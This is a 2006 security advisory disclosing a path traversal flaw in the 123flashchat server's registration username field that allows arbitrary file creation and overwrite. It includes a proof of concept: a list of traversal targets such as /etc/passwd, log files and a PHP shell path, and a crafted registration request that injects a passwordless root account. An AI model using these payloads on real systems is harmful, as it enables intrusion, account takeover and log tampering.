=============================================
INTERNET SECURITY AUDITORS ALERT 2006-001
- Original release date: January 09, 2006
- Last revised: January 13, 2006
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
Arbitrary remote file creation in 123flashchat server.

II. BACKGROUND
-------------------------
123 Flash Chat is a full featured java chat server and flash chat
client, the product homepage is www.123flashchat.com and it is
possible to test it at:

http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf


III. DESCRIPTION
-------------------------
The chat server has a user-register functionality, that can be enabled
by the following sentence:

<enable-user-register>On</enable-user-register>

in /server/etc/groups/default.xml

By default it is enabled and anybody can create a chat account.


The register form ask the following questions:
username, password, repeat-password and email.

When a user creates an account, a file is created at members directory:

/123flashchat/server/data/default/members/isec-user

The user file has the following structure:
^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@

                      allow
field         size    null    parse                     example
username      32      no      (allow transversal ../)   ../room_1.txt
password      32      no      allow all                 123
repeat-pass   32      no      allow all                 123
email         128     yes     /^.+@.+\..+$/aa           a@b.c


Username field allow anybody to create a file in our system, with same
priviledges as the server and almost arbitrary content.

This is dangerous becouse, a user can get others account, erase logs,
modify the server's /etc/passwd or modify other config files.


IV. PROOF OF CONCEPT
-------------------------
In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes


Possible attacs:


../../../../logs/access.log       erase logs.
../../../../logs/error.log        erase logs.
../default/logs/access.log        erase logs.
../members/parker                 change parker's password, if now we
                                  login with parker user, he will be
                                  disconected.

../../../../../../../etc/passwd   if server run as root.
../../../../etc/ssh/sshd.conf     if server run as root.
../../../../../var/log/messages   if server run as root.
../../../../var/www/htdocs/x.php  try to build a shell.
../../../etc/groups/default.xml   create an admin account by or other
                                  config settings.
../../../fcserver.sh              try to replace the script.

etc.

It is possible to replace the existent files, to make a DoS, to erase
logs, to create/change system accounts, to get other chat user/admin
accounts or to make other effects in server's system.

*Possible* remote execution if some config file is modified.

Is it possible to hijack and modify the raw command, to inyect line
feed (0x0a) or other characters to construct arbitrary content of the
created/overwrited file.

Example:

<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)

/etc/passwd will be:

\0\2\0\3../../../../../../../etc/passwd\0\3
root::0:0:root:/bin/bash
\0\0

If the server is Windows, is it possible to get execution.


V. BUSINESS IMPACT
-------------------------
The chat service can be crashed or compromissed remotelly.


VI. SYSTEMS AFFECTED
-------------------------
This vulnerability affects the 123flaschat server up to 5.1 (released
on Dec 22, 2005)

tested at:
123flaschat server 5.1
123flaschat server 5.0


VII. SOLUTION
-------------------------
The vendor released the 5.1_2 version.

http://www.123flashchat.com/flash-chat-server-v512.html


VIII. REFERENCES
-------------------------
 -

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Jesus Olmos
Gonzalez (jolmos=at=isecauditors=dot=com).


X. REVISION HISTORY
-------------------------
January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.


XI. DISCLOSURE TIMELINE
-------------------------
January 04, 2006    The vulnerability discovered by Internet Security
Auditors (http://www.isecauditors.com)
January 09, 2006    Initial vendor notification sent.
January 10, 2006    Quick response, Version 5.1_2 was released.

XII. LEGAL NOTICES
-------------------------
-